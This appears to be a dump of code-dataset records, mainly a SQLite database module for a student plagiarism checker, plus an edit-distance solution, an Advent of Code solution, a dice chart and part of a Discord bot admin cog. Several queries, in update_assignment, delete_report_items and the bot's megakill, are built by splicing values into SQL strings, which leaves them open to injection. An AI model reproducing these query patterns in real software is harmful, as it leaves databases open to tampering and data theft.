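    for i in range(len(stripped) - n + 1):
        yield hash('\n'.join(stripped[i:i + n])), i + 1  # (NgramHash, LineNumber)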
The generated signatures are stored in the database using the insert method.\n Signatures is a list and is stored element by element before the cursor is closed.'''\n\n def store_signatures(self,signatures,submission_id):\n c = self.conn.cursor()\n for s in signatures:\n signature_values = (s.line_number_mine,s.ngram_hash, submission_id)\n c.execute(\"INSERT INTO Signatures(LineNumber,NgramHash,SubmissionId) VALUES(?,?,?)\",signature_values)\n self.signature_manager.store_signature(s, submission_id)\n c.close()\n self.conn.commit()\n\n '''store_submission stores a submission so that it can be checked against other\n submissions. This method accepts the concatenated files from the .zip folder, the assignment number, the student number and\n the programming language, and inserts the relevant data into the database.\n '''\n\n def store_submission(self,concatenated_file, assignment_number, student_number, language):\n c = self.conn.cursor()\n submission_value = (student_number, assignment_number, concatenated_file, language)\n\n c.execute(\"INSERT INTO Submissions (StudentId,AssignmentNumber, ProgramSource, ProgrammingLanguage) VALUES (?,?,?,?)\",submission_value)\n submission_id = c.lastrowid\n c.close()\n self.conn.commit()\n return submission_id\n\n\n\n '''lookup_matching_signatures looks up signatures which will be used to check for potential cheating or copied code. This\n method accepts the submission ID as a parameter and returns the relevant matches'''\n\n def lookup_matching_signatures(self, submission_id):\n return self.signature_manager.lookup_matching_signatures(submission_id)\n\n '''data_populate is a method used to insert students into the database for testing. This method accepts the student\n number and course code to populate the database with relevant information.'''\n\n def data_populate(self,student_number, course_code):\n c = self.conn.cursor()\n data_Values = (student_number,course_code)\n c.execute(\"INSERT INTO Students (StudentNumber, CourseCode) VALUES (?,?)\",data_Values)\n c.close()\n self.conn.commit()\n\n '''fetch_student fetches a student from the database.\n This method accepts the student id and returns the matching Student record,\n or None when no such student exists.\n '''\n\n def fetch_student(self,studentId):\n c = self.conn.cursor()\n c.execute('SELECT Id, StudentNumber,CourseCode FROM Students where Id =?', (studentId,))\n student = None\n for x in c:\n # Columns are (Id, StudentNumber, CourseCode); map them in that order.\n student = Student(\n id = x[0],\n student_number = x[1],\n course_code = x[2]\n )\n c.close()\n return student\n\n '''fetch_an_assignment fetches a requested assignment and is used by the UI\n to display/illustrate potential cheating in code. This method accepts the assignment number, which is then looked up\n in the database.\n '''\n\n def fetch_an_assignment(self,assignmentNumber):\n c = self.conn.cursor()\n c.execute('SELECT Id, CourseCode, AssignmentDescription, DueDate FROM Assignments WHERE Id=?' ,(assignmentNumber, ))\n assignment = None\n for x in c:\n assignment = Assignment(\n id = x[0],\n course_code = x[1],\n description = x[2],\n due_date = x[3]\n )\n c.close()\n return assignment\n\n '''fetch_current_assignments fetches assignments which have already been submitted in order to check the assignments\n against each other for matches'''\n\n def fetch_current_assignments(self):\n c = self.conn.cursor()\n date = time.strftime('%Y-%m-%d')\n c.execute('SELECT Id, CourseCode, AssignmentDescription, DueDate, DueDate < ? 
FROM Assignments',(date,))\n assignments = []\n for row in c:\n count = self.count_submissions(row[0])\n assignments.append(Assignment(row[0], row[1], row[2], row[3], row[4], count))\n c.close()\n return assignments\n\n '''fetch_a_submission fetches a specific submission to be compared to another specific assignment. This method accepts\n the submission ID as a parameter and is then found in the database.'''\n def fetch_a_submission(self, assignment_id, submission_id=None):\n if submission_id is None:\n assignment_id, submission_id= None, assignment_id\n c = self.conn.cursor()\n c.execute('SELECT Id, StudentId, AssignmentNumber, ProgramSource, SubmissionDate, '\n 'ProgrammingLanguage, AssignmentNumber FROM Submissions WHERE Id = ?',\n (submission_id, ))\n submission = None\n for x in c:\n if assignment_id is not None:\n assert int(x[6]) == int(assignment_id)\n submission = Submission(\n id=x[0],\n student_number=x[1],\n program_source=x[3],\n assignment_id=x[2],\n submission_date=x[4],\n language=x[5])\n c.close()\n return submission\n\n '''fetch_submissions fetches a specific set of submissions. This method accepts\n the assignment ID as a parameter and is then found in the database.'''\n\n def fetch_submissions(self, assignment_id):\n c = self.conn.cursor()\n submissions = []\n c.execute('SELECT Id, StudentId, AssignmentNumber, ProgramSource, SubmissionDate, '\n 'ProgrammingLanguage FROM Submissions WHERE AssignmentNumber = ?' ,(assignment_id, ))\n for x in c:\n submissions.append(\n Submission(\n id=x[0],\n student_number=x[1],\n program_source=x[3],\n assignment_id=x[2],\n submission_date=x[4],\n language=x[5]))\n c.close()\n return submissions\n\n '''fetch_source_code fetches source code from a specific assignment. This method accepts\n the assignment ID as a parameter and is then found in the database.'''\n\n def fetch_source_codes(self, assignment_id):\n c = self.conn.cursor()\n source_codes = {}\n c.execute('SELECT StudentId, ProgramSource '\n 'ProgrammingLanguage FROM Submissions WHERE AssignmentNumber = ?' ,(assignment_id, ))\n for x in c:\n source_codes[str(x[0])] = x[1]\n c.close()\n return source_codes\n\n '''store_assignment stores a specific assignment that a lecturer has created.\n This method accepts the assignment description and due date as a parameter and is then stored in the database.'''\n\n def store_assignment(self,courseCode, assignment_description,due_date):\n c = self.conn.cursor()\n\n assignmentValues = (assignment_description,due_date,courseCode)\n\n c.execute('INSERT INTO Assignments (AssignmentDescription,DueDate,CourseCode) VALUES (?,?,?)',assignmentValues)\n assignment_id = c.lastrowid\n c.close()\n self.conn.commit()\n return assignment_id\n\n\n '''delete_student deletes a student from the students table.\n This method accepts the student Id as a parameter and is then deleted from the table.'''\n def delete_student(self,studentId):\n c = self.conn.cursor()\n c.execute('DELETE FROM Students where StudentNumber=?' ,(studentId, ))\n c.close()\n self.conn.commit()\n\n '''delete_assignment deletes an assignment from the Assignments table.\n This method accepts the Assignment Id as a parameter and is then deleted from the table.'''\n\n def delete_assignment(self, assignmentNumber):\n c = self.conn.cursor()\n c.execute('DELETE FROM Assignments where Id=?' 
,(assignmentNumber, ))\n c.execute('DELETE FROM sqlite_sequence WHERE name=\"Assignments\"')\n self.delete_submissions(assignmentNumber)\n c.close()\n self.conn.commit()\n\n '''update_assignment is a method used in the event that a lecturer has changed the assignment so the changes can be\n stored and then reflected in the database. This method accepts the assignment number, course code, assignment\n desciption and due date as parameters and then updates accordingly'''\n\n def update_assignment(self, assignmentNumber, courseCode, assignmentDescription, dueDate):\n c = self.conn.cursor()\n c.execute('SELECT * FROM Assignments WHERE Id=?', (assignmentNumber, ))\n for row in c:\n course_code = row[1]\n description = row[2]\n if (courseCode):\n course_code = courseCode\n if (assignmentDescription):\n description = assignmentDescription\n if (dueDate):\n dueDate = dueDate\n c.execute('UPDATE Assignments SET CourseCode=\"' + course_code + '\", AssignmentDescription=\"' + description + '\", DueDate=\"' + dueDate + '\" WHERE ID=' + assignmentNumber + ';')\n c.close()\n self.conn.commit()\n\n '''delete_submissions deletes all submissions with a specific assignment number from the submission table.\n This method accepts the assignment number as a parameter and is then deleted from the table.'''\n\n def delete_submissions(self, assignmentNum):\n c = self.conn.cursor()\n c.execute('DELETE FROM Submissions where AssignmentNumber=?' ,(assignmentNum, ))\n c.close()\n self.conn.commit()\n\n '''delete_submission deletes a submission item from the submission table.\n This method accepts the submission Id as a parameter and is then deleted from the table.'''\n\n def delete_submission(self,submissionId):\n c = self.conn.cursor()\n c.execute('DELETE FROM Submissions where Id=?' ,(submissionId, ))\n c.close()\n self.conn.commit()\n\n '''count_submissions counts the number of submissions per assignment.'''\n\n def count_submissions(self, assignment_num):\n c = self.conn.cursor()\n c.execute('SELECT Count(*) FROM Submissions WHERE AssignmentNumber=?' ,(assignment_num, ))\n count = c.fetchone()[0]\n c.close()\n return count\n\n\n '''delete_signatures deletes a signature item from the signature table.\n This method accepts the signature Id as a parameter and is then deleted from the table.'''\n\n def delete_signatures(self,signatureId):\n c = self.conn.cursor()\n c.execute('DELETE FROM Signatures where Id=?' 
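# Sketch: update_assignment above splices values directly into the SQL string;
# an equivalent parameterized UPDATE (illustrative) avoids the quoting and
# injection pitfalls of string concatenation:
#   c.execute('UPDATE Assignments SET CourseCode=?, AssignmentDescription=?, DueDate=? WHERE Id=?',
#             (course_code, description, dueDate, assignmentNumber))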
,(signatureId, ))\n c.close()\n self.conn.commit()\n\n '''Fetches the maximum submission Id from the submissions table'''\n\n def fetch_max_submission_id(self):\n c = self.conn.cursor()\n c.execute('SELECT MAX(Id) FROM Submissions')\n max_id = c.fetchone()[0]\n c.close()\n return max_id\n\n '''Fetches the submission with the most matching lines of code from the submissions matches table'''\n\n def fetch_max_submission_match_id(self):\n c = self.conn.cursor()\n c.execute('SELECT MAX(SubmissionId) FROM SubmissionMatches')\n max_id = c.fetchone()[0]\n c.close()\n return max_id\n\n '''Fetches the submission match from the submissions matches table which is specified.'''\n\n def fetch_submission_match(self, submission_id):\n c = self.conn.cursor()\n c.execute('SELECT Id, SubmissionId, MatchSubmissionId, NumberSignaturesMatched, Confidence '\n 'FROM SubmissionMatches WHERE SubmissionId = ?', (submission_id, ))\n row = c.fetchone()\n match = None\n if row:\n match = SignatureMatch(*row)\n c.close()\n\n return match\n '''Updates the submission matches table with the new signature match, submission id and signatires matched.'''\n\n def update_submission_match(self, submission_id, signature_match, match_submission_id, number_signatures_matched, confidence):\n assert submission_id != match_submission_id\n c = self.conn.cursor()\n c.execute('UPDATE SubmissionMatches SET MatchSubmissionId = ?, NumberSignaturesMatched = ?, '\n 'Confidence=? WHERE SubmissionId = ?',\n (match_submission_id, number_signatures_matched, confidence, submission_id))\n c.close()\n self.conn.commit()\n\n '''store_submission_match stores a submission match that has been identified.\n This method accepts the submission ID, other submission ID and the number of match potential\n as a parameter and is then stored in the database.'''\n\n def store_submission_match(self, assignment_id, submission_id, other_submission_id, number_signatures_match, confidence):\n assert int(submission_id) != int(other_submission_id)\n c = self.conn.cursor()\n c.execute('INSERT INTO SubmissionMatches (SubmissionId, MatchSubmissionId, NumberSignaturesMatched, StudentId1, StudentId2, AssignmentId, Confidence)'\n ' VALUES (?, ?, ?, (SELECT StudentId FROM Submissions WHERE Id=?), (SELECT StudentId FROM Submissions WHERE Id=?),?, ?)',\n (submission_id, other_submission_id, number_signatures_match, submission_id, other_submission_id, assignment_id, confidence))\n c.close()\n self.conn.commit()\n\n '''fetch_all_submission_matches fetches all submission matches that has been identified.\n This method accepts the assignment number as a parameter and is then selected from the database.'''\n\n def fetch_all_submission_matches(self, assignment_num):\n c = self.conn.cursor()\n c.execute('SELECT Id, SubmissionId, MatchSubmissionId, NumberSignaturesMatched, Confidence, StudentId1, StudentId2 '\n 'FROM SubmissionMatches WHERE AssignmentId = ? 
ORDER BY Confidence DESC', (assignment_num, ))\n results = []\n for row in c:\n results.append(SignatureMatch(*row))\n c.close()\n return results\n\n '''fetch_report fetches all submissions from an assignment and a report is later generated.\n This method accepts the assignment number as a parameter and is then selected from the database.'''\n\n def fetch_report(self, assignment_num):\n c = self.conn.cursor()\n c.execute('SELECT * FROM Reports WHERE AssignmentNumber=?', (assignment_num, ))\n results = []\n for row in c:\n results.append(row[1])\n c.close()\n return results\n\n '''insert_report_item inserts a new report item for a report which is later generated.\n This method accepts the assignment number and student number as a parameter and is then inserted from the database.'''\n\n def insert_report_item(self, assignment_num, student_num):\n c = self.conn.cursor()\n c.execute('INSERT INTO Reports (StudentNumber, AssignmentNumber) VALUES (?,?)', (student_num, assignment_num, ))\n c.close()\n self.conn.commit()\n\n '''delete_report_items deletes a report item from the report table.\n This method accepts the assignment number and student number as a parameter and is then deleted from the table.'''\n\n def delete_report_items(self, assignment_num, student_nums):\n c = self.conn.cursor()\n student_nums = ','.join(map(\"'{0}'\".format, student_nums))\n query = 'DELETE FROM Reports WHERE AssignmentNumber=%s AND StudentNumber IN (%s)' % (assignment_num, student_nums)\n c.execute(query)\n c.close()\n self.conn.commit()\n\n '''count_cheaters counts the number of student suspected of cheating on a particular assignment. The assignment number\n is entered as a parameter and all relevant data is deleted from the database.'''\n\n def count_cheaters(self, assignment_num):\n c = self.conn.cursor()\n c.execute('SELECT Count(*) FROM Reports WHERE AssignmentNumber=?' ,(assignment_num, ))\n count = c.fetchone()[0]\n c.close()\n return count\n\n '''store_matches stores a match from a particular assignment. The submission id, other student submission id and relevant matches\n are entered as a parameter and all relevant data is deleted from the database.'''\n\n def store_matches(self, submission_id, other_submission_id, matches0, matches1):\n c = self.conn.cursor()\n\n matchstring = '(?, ?, ?, ?, 0),'*len(matches0) + '(?, ?, ?, ?, 1),'*len(matches1)\n matchstring=matchstring[:-1]\n\n matchsubmission = []\n for match in matches0+matches1:\n matchsubmission.append(submission_id)\n matchsubmission.append(other_submission_id)\n matchsubmission.append(match.start_line_mine)\n matchsubmission.append(match.match_length)\n query = 'INSERT INTO Matches (SubmissionId, MatchSubmissionId, MatchStartLine, MatchLength, Direction) VALUES %s' % matchstring\n c.execute(query, matchsubmission)\n c.close()\n self.conn.commit()\n\n '''fetch_matches fetches all matches from a particular assignment. The submission id and direction\n are entered as a parameter and all relevant data is deleted from the database.'''\n\n def fetch_matches(self, submission_id, direction):\n c = self.conn.cursor()\n c.execute('SELECT MatchSubmissionId, MatchStartLine, MatchLength, Direction FROM Matches WHERE '\n 'SubmissionId = ? 
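# Sketch: delete_report_items above %-formats values into the IN (...) clause;
# a parameterized variant (illustrative) generates one placeholder per value
# and keeps the values out of the SQL text entirely:
#   placeholders = ','.join('?' * len(student_nums))
#   c.execute(f'DELETE FROM Reports WHERE AssignmentNumber=? AND StudentNumber IN ({placeholders})',
#             [assignment_num, *student_nums])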
AND Direction=?', (submission_id, direction))\n matches = []\n for row in c:\n if row[3] == '0':\n matches.append(Match(row[0], row[1], row[2], 0))\n else:\n matches.append(Match(submission_id, row[1], row[2], 0))\n\n c.close()\n return matches\n","repo_name":"MrHamdulay/csc3-capstone","sub_path":"cheaters/database/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":20172,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"4982981221","text":"class Solution(object):\n def minDistance(self, word1, word2):\n \"\"\"\n :type word1: str\n :type word2: str\n :rtype: int\n \"\"\"\n m = len(word1)\n n = len(word2)\n A = [[0 for j in range(n+1)] for i in range(m+1)]\n # A[i][j] is the min edit distance from word1[:i] to word2[:j]\n for i in range(m+1):\n for j in range(n+1):\n if i == 0:\n A[0][j] = j\n elif j == 0:\n A[i][0] = i\n elif word1[i-1] == word2[j-1]:\n A[i][j] = A[i-1][j-1]\n else:\n A[i][j] = 1 + min(A[i-1][j-1], A[i][j-1], A[i-1][j])\n return A[-1][-1]\n","repo_name":"ZiningZhu/Leetcode","sub_path":"072-edit-distance/soln.py","file_name":"soln.py","file_ext":"py","file_size_in_byte":725,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"74848434361","text":"from collections import defaultdict\nfrom functools import lru_cache\nfrom pprint import pprint\n\nfrom aocd_tools import load_input_data, Grid\n\nEXAMPLE = \"\"\"\"\"\"\n\n\ndef parse(line):\n return line\n\n\ndef run():\n print(\"solution1 = \", solution1(2, 5))\n print(\"solution2 = \", solution2(2, 5))\n\n\ndef deterministic_dice():\n n = 1\n while True:\n yield n\n n += 1\n if n > 100:\n n = 1\n\n\ndef solution1(p1, p2):\n dice = deterministic_dice()\n positions = [p1 - 1, p2 - 1]\n scores = [0, 0]\n turn = 0\n die_rolls = 0\n while all(s < 1000 for s in scores):\n dice_roll = next(dice) + next(dice) + next(dice)\n die_rolls += 3\n positions[turn] += dice_roll\n score = 1 + positions[turn] % 10\n scores[turn] += score\n print(f\"player {turn + 1} rolls {dice_roll} and moves to {score} for a total score of {scores[turn]}\")\n turn = (turn + 1) % 2\n\n return min(scores) * die_rolls\n\n\ndef make_defaultdict_int():\n return defaultdict(int)\n\n\nroll_distribution = defaultdict(int)\nfor r1 in range(1, 4):\n for r2 in range(1, 4):\n for r3 in range(1, 4):\n roll_distribution[sum((r1, r2, r3))] += 1\n\n\n@lru_cache(maxsize=None)\ndef count_wins(score1, score2, pos1, pos2):\n if score1 >= 21: return 1, 0\n if score2 >= 21: return 0, 1\n win1, win2 = 0, 0\n for roll, count in roll_distribution.items():\n new_pos = 1 + (pos1 + roll - 1) % 10\n new_score = score1 + new_pos\n add_win2, add_win1 = count_wins(score2, new_score, pos2, new_pos)\n win1 += add_win1 * count\n win2 += add_win2 * count\n return win1, win2\n\n\ndef solution2(pos1, pos2):\n return count_wins(0, 0, pos1, pos2)\n\n\ndef solution2_aargh(p1, p2):\n roll_distribution = defaultdict(int)\n for r1 in range(1, 4):\n for r2 in range(1, 4):\n for r3 in range(1, 4):\n roll_distribution[sum((r1, r2, r3))] += 1\n\n pprint(roll_distribution)\n\n positions = defaultdict(make_defaultdict_int)\n positions[(p1, p2)][(0, 0)] += 1\n wins1 = wins2 = 0\n\n while positions:\n new_positions = defaultdict(make_defaultdict_int)\n for roll1, count1 in roll_distribution.items():\n for roll2, count2 in roll_distribution.items():\n multiplier = count2 * count1\n for p, scores in positions.items():\n p1, p2 = p\n p1 = 1 + (p1 + roll1 - 1) % 10\n p2 = 1 + 
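# Worked example for the edit-distance DP in the Solution class above:
# A[i][j] takes the best of replace/match (A[i-1][j-1]), insert (A[i][j-1])
# and delete (A[i-1][j]). For the classic case "horse" -> "ros" the answer
# is 3 (horse -> rorse -> rose -> ros):
assert Solution().minDistance("horse", "ros") == 3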
(p2 + roll2 - 1) % 10\n for s, count in scores.items():\n s1, s2 = s\n s1 += p1\n s2 += p2\n new_count = count * multiplier\n if s1 >= 21:\n wins1 += new_count\n elif s2 >= 21:\n wins2 += new_count\n else:\n new_positions[(p1, p2)][(s1, s2)] = new_count\n positions = new_positions\n print(wins1, wins2)\n\n return max((wins1, wins2))\n\n\nif __name__ == \"__main__\":\n run()\n","repo_name":"heroworkshop/advent_of_code","sub_path":"y2021/day_21.py","file_name":"day_21.py","file_ext":"py","file_size_in_byte":3121,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
{"seq_id":"22699541649","text":"from die import Die\r\nimport pygal\r\n \r\ndie = Die()\r\n \r\n# Collect the roll results\r\nresults = []\r\ncount = 1\r\nfor roll_num in iter(lambda *args:die.roll(),None):\r\n results.append(roll_num)\r\n if count >= 1000:\r\n break\r\n count +=1\r\n \r\n# Analyse the results\r\nfrequencies= []\r\nfor value in range(1,die.num_sides+1):\r\n frequencie = results.count(value)\r\n frequencies.append(frequencie)\r\n \r\n# Visualise the results\r\nhist = pygal.Bar() # create a bar chart instance\r\nhist.title = 'Results of rolling one D6 1000 times' # chart title\r\nhist.x_labels = ['1','2','3','4','5','6'] # x-axis value labels\r\nhist.x_title = 'Result' # x-axis title\r\nhist.y_title = 'Frequency of Result' # y-axis title\r\n \r\nhist.add('D6',frequencies) # pass in the y-axis data\r\nhist.render_to_file('die_visual.svg') # output file path; must be an svg file\r\n\r\n","repo_name":"Kung-Fu-Master/Python","sub_path":"books/Python_Crash_Course/die_visual.py","file_name":"die_visual.py","file_ext":"py","file_size_in_byte":905,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"40"}
{"seq_id":"39343983961","text":"import json\nfrom functools import partial\nfrom io import BytesIO\nfrom datetime import datetime\nimport os\nimport sys\nimport asyncio\n\nimport discord\nfrom discord.ext import commands\nfrom discord.ext.commands.cooldowns import BucketType\nimport discord.errors as discordErrors\nimport pymysql.err as mysqlError\nimport psutil\nfrom tabulate import tabulate\n\nfrom utils import checks\n\n\n\nclass avaAdmin(commands.Cog):\n def __init__(self, client):\n from .avaTools import avaTools\n from .avaUtils import avaUtils\n\n self.client = client\n\n self.utils = avaUtils(self.client)\n self.tools = avaTools(self.client, self.utils)\n\n print(\"|| Admin --- Ready!\")\n\n\n\n # ================== EVENTS ==================\n\n # @commands.Cog.listener()\n # async def on_ready(self):\n # print(\"|| Admin --- Ready!\")\n\n #@commands.command(pass_context=True)\n #@checks.check_author()\n #async def milestime(self, ctx):\n # self.client.STONE = datetime.now()\n # self.data_updating()\n\n\n\n # ================== SYSTEM WIDE ==================\n @commands.command()\n @checks.check_author()\n async def user_block(self, ctx, *args):\n try: self.client.ignore_list.append(ctx.message.mentions[0])\n except IndexError: return\n\n await ctx.send(\":white_check_mark:\")\n\n @commands.command()\n @checks.check_author()\n async def fetch_invite(self, ctx, *args):\n cns = self.client.get_guild(int(args[0])).channels\n for c in cns:\n try:\n ivi = await c.create_invite(max_uses=2)\n await ctx.send(ivi)\n return\n except discordErrors.NotFound: pass\n except discordErrors.Forbidden: pass\n await ctx.send(\":x: Unable to create invitation.\")\n\n\n\n # ================== GAME MANAGER ==================\n # MEGA\n @commands.command()\n @checks.check_author()\n async def megagive(self, ctx, *args):\n try: target = await commands.MemberConverter().convert(ctx, args[0])\n 
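# Usage note for the memoized count_wins above: states are
# (score1, score2, pos1, pos2) with 1-based positions, and the 27 three-roll
# outcomes of the quantum die collapse to {3:1, 4:3, 5:6, 6:7, 7:6, 8:3, 9:1}.
# For the AoC 2021 day 21 example (starting positions 4 and 8) it yields
# (444356092776315, 341960390180808), matching the published example answer:
# print(solution2(4, 8))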
except commands.CommandError: await ctx.send(\"Invalid `user`\"); return\n except IndexError: await ctx.send(\"Missing `user`\"); return\n\n try: money = int(args[1])\n except IndexError: await ctx.send('Missing `money`'); return\n except ValueError: await ctx.send('Invalid `money`'); return\n\n if await self.client._cursor.execute(f\"UPDATE personal_info SET money=money+{money} WHERE id='{target.id}';\") == 0:\n await ctx.send(f\"User **{target.name}** has not incarnted\"); return\n \n await ctx.send(f\":white_check_mark: Under the name of almighty Aknalumos, **<:36pxGold:548661444133126185>{money}** has been given to **{target.name}**!\"); return\n\n @commands.command()\n @checks.check_author()\n async def megatao(self, ctx, *args):\n try: target = await commands.MemberConverter().convert(ctx, args[0])\n except commands.CommandError: await ctx.send(\"Invalid `user`\"); return\n except IndexError: await ctx.send(\"Missing `user`\"); return\n\n try: item_code = args[1]\n except IndexError: await ctx.send(\"Missing `item_code`\"); return\n\n try: quantity = int(args[2])\n except (ValueError, IndexError): quantity = 1\n\n if item_code.startswith('ig'):\n t = await self.client._cursor.execute(f\"SELECT func_ig_reward('{target.id}', '{item_code}', {quantity}); \")\n elif item_code.startswith('it') or item_code.startswith('ar') or item_code.startswith('am') or item_code.startswith('bp'):\n t = await self.client._cursor.execute(f\"SELECT func_it_reward('{target.id}', '{item_code}', {quantity}); \")\n elif item_code.startswith('if'):\n try: land_code = args[3]\n except IndexError: await ctx.send(\"Missing `land_code`\"); return\n t = await self.client._cursor.execute(f\"SELECT func_if_reward('{land_code}', '{item_code}', {quantity}); \")\n \n if not t: await ctx.send(\":x:\"); print(t); return\n await ctx.send(f\":white_check_mark: Given {quantity} `{item_code}` to **{target.name}**\")\n\n @commands.command()\n @checks.check_author()\n async def megafreeze(self, ctx, *args):\n try:\n target_id = ctx.message.mentions[0].id\n cmd_tag = args[1]\n if cmd_tag.startswith('<@'): cmd_tag = args[0]\n except (IndexError, TypeError): await ctx.send(\":warning: Missing stuff!\"); return\n\n if await self.client.loop.run_in_executor(None, partial(self.client.thp.redio.delete, f'{cmd_tag}{target_id}')) == 0: await ctx.send(':x:')\n else: await ctx.send(':white_check_mark:')\n\n @commands.command()\n @checks.check_author()\n async def megakill(self, ctx, *args):\n if not args: await ctx.send(\":warning: Missing user!\"); return\n try: \n target_id = ctx.message.mentions[0].id\n target_name = ctx.message.mentions[0].mention\n except (IndexError, TypeError):\n target_id = args[0]\n target_name = args[0]\n\n query = f\"\"\"DELETE FROM pi_degrees WHERE user_id='{target_id}';\n DELETE FROM pi_guild WHERE user_id='{target_id}';\n DELETE FROM cosmetic_preset WHERE user_id='{target_id}';\n DELETE FROM pi_arts WHERE user_id='{target_id}';\n UPDATE pi_inventory SET existence='BAD' WHERE user_id='{target_id}';\n UPDATE pi_land SET user_id='BAD' WHERE user_id='{target_id}';\n DELETE FROM pi_bank WHERE user_id='{target_id}';\n DELETE FROM pi_avatars WHERE user_id='{target_id}';\n DELETE FROM pi_hunt WHERE user_id='{target_id}';\n DELETE FROM pi_mobs_collection WHERE user_id='{target_id}';\n DELETE FROM pi_rest WHERE user_id='{target_id}';\n DELETE FROM pi_quests WHERE user_id='{target_id}';\n DELETE FROM personal_info WHERE id='{target_id}';\"\"\"\n\n if await self.client._cursor.execute(query) == 0:\n await 
ctx.send(':warning: User has not incarnated'); return\n await ctx.send(f\":white_check_mark: Slashed {target_name} into half. Bai ya~\")\n\n # UDA\n @commands.command()\n @commands.cooldown(1, 5, type=BucketType.user)\n @checks.check_author()\n async def ituda(self, ctx, *args):\n\n codes = await self.client.quefe(f\"SELECT item_code FROM pi_inventory WHERE item_code LIKE 'it%' OR item_code LIKE 'ar%' OR item_code LIKE 'am%';\", type='all')\n\n for code in codes:\n # await self.client._cursor.execute(f\"UPDATE pi_inventory p INNER JOIN model_item m ON m.item_code='{code[0]}' SET p.tags=m.tags, p.weight=m.weight, p.defend=m.defend, p.multiplier=p.multiplier, p.str=m.str, p.intt=m.intt, p.sta=m.sta, p.speed=m.speed, p.round=m.round, p.accuracy_randomness=m.accuracy_randomness, p.accuracy_range=m.accuracy_range, p.range_min=m.range_min, p.range_max=m.range_max, p.firing_rate=m.firing_rate, p.reload_query=m.reload_query, p.effect_query=m.effect_query, p.infuse_query=m.infuse_query, p.passive_query=m.passive_query, p.ultima_query=m.ultima_query, p.price=m.price, p.dmg=m.dmg, p.stealth=m.stealth, p.evo=m.evo, p.aura=m.aura, p.craft_value=m.craft_value, p.illulink=m.illulink, p.origin_base=m.origin_base WHERE p.item_code='{code[0]}';\")\n # Specific\n await self.client._cursor.execute(f\"UPDATE pi_inventory p INNER JOIN model_item m ON m.item_code='{code[0]}' SET p.origin_base=m.origin_base WHERE p.item_code='{code[0]}';\")\n\n await ctx.send(\":white_check_mark:\")\n\n @commands.command()\n @commands.cooldown(1, 5, type=BucketType.user)\n @checks.check_author()\n async def mobuda(self, ctx, *args):\n\n codes = await self.client.quefe(f\"SELECT DISTINCT mob_code FROM model_mob;\", type='all')\n\n for code in codes:\n await self.client._cursor.execute(f\"UPDATE environ_mob e INNER JOIN model_mob m ON m.mob_code='{code[0]}' SET e.name=m.name, e.description=m.description, e.lp=m.lp, e.str=m.str, e.chain=m.chain, e.speed=m.speed, e.au_FLAME=m.au_FLAME, e.au_ICE=m.au_ICE, e.au_HOLY=m.au_HOLY, e.au_DARK=m.au_DARK, e.effect=m.effect, e.illulink=m.illulink WHERE e.mob_code='{code[0]}';\")\n\n await ctx.send(\":white_check_mark:\")\n\n @commands.command()\n @commands.cooldown(1, 5, type=BucketType.user)\n @checks.check_author()\n async def world_rebuild(self, ctx, *args):\n try:\n if args[0] == 'truncate': truncate = True\n else: truncate = False\n except IndexError: truncate = False\n\n # TRUNCATE\n if truncate: await self.client._cursor.execute(\"TRUNCATE environ_mob;\")\n\n await self.tools.world_built()\n\n await ctx.send(\":white_check_mark:\")\n\n @commands.command()\n @commands.cooldown(1, 5, type=BucketType.user)\n @checks.check_author()\n async def world_build(self, ctx, *args):\n await self.tools.world_built()\n await ctx.send(\":white_check_mark:\")\n\n # MISC\n @commands.command()\n @checks.check_author()\n async def view_item(self, ctx, *args):\n\n item_code, name, description, tags, weight, defend, multiplier, strr, intt, sta, speed, round, accuracy_randomness, accuracy_range, range_min, range_max, firing_rate, dmg, stealth, aura, illulink, price = await self.client.quefe(f\"\"\"SELECT item_code, name, description, tags, weight, defend, multiplier, str, intt, sta, speed, round, accuracy_randomness, accuracy_range, range_min, range_max, firing_rate, dmg, stealth, aura, illulink, price FROM pi_inventory WHERE item_id='{args[0]}';\"\"\")\n\n # Pointer\n if 'magic' in tags: pointer = ':crystal_ball:'\n else: pointer = '<:gun_pistol:508213644375621632>'\n # Aura icon\n aui = {'FLAME': 
'https://imgur.com/3UnIPir.png', 'ICE': 'https://imgur.com/7HsDWfj.png', 'HOLY': 'https://imgur.com/lA1qfnf.png', 'DARK': 'https://imgur.com/yEksklA.png'}\n\n line = f\"\"\":scroll: **`『Weight』` ·** {weight} ⠀ ⠀:scroll: **`『Price』` ·** {price}\\n\\n```\"{description}\"```\\n\"\"\"\n \n reembed = discord.Embed(title=f\"`{item_code}`|**{' '.join([x for x in name.upper()])}**\", colour = discord.Colour(0x011C3A), description=line)\n reembed.add_field(name=\":scroll: Basic Status <:broadsword:508214667416698882>\", value=f\"**`『STR』` ·** {strr}\\n**`『INT』` ·** {intt}\\n**`『STA』` ·** {sta}\\n**`『MULTIPLIER』` ·** {multiplier}\\n**`『DEFEND』` ·** {defend}\\n**`『SPEED』` ·** {speed}\", inline=True)\n\n try: acc_per = 10//accuracy_randomness\n except ZeroDivisionError: acc_per = 0\n reembed.add_field(name=f\":scroll: Projector Status {pointer}\", value=f\"**`『RANGE』` ·** {range_min} - {range_max}m\\n**`『STEALTH』` ·** {stealth}\\n**`『FIRING-RATE』` ·** {firing_rate}\\n**`『ACCURACY』` ·** {acc_per}/{accuracy_range}m\\n**-------------------**\\n**`『ROUND』` ·** {round} \\n**`『DMG』` ·** {dmg}\", inline=True)\n\n reembed.set_thumbnail(url=aui[aura])\n if illulink != 'n/a': reembed.set_image(url=illulink)\n\n await ctx.send(embed=reembed); return\n\n\n\n # ================== SYS MANIP ==================\n\n @commands.command()\n @checks.check_author()\n async def megasql(self, ctx, *, args):\n if str(ctx.author.id) != '214128381762076672': await ctx.send(\"SHOO SHOO!\"); return\n ret = await self.client.quefe(args, type='all')\n await ctx.send(f\"Total: {len(ret)}\")\n await ctx.send(tabulate(ret, showindex=\"always\"))\n\n @commands.command()\n @checks.check_author()\n async def megareload(self, ctx, *args):\n temp = []\n name = ''\n try:\n for n in args[0].split('.'):\n if n == 'c': temp.append('cogs'); continue\n elif n == 'a': temp.append('avasoul_pack'); continue\n temp.append(n)\n name = '.'.join(temp)\n except IndexError: await ctx.send(\":x: Missing cog's name\"); return\n\n self.client.reload_extension(name)\n \n # Prep =====================\n cog = 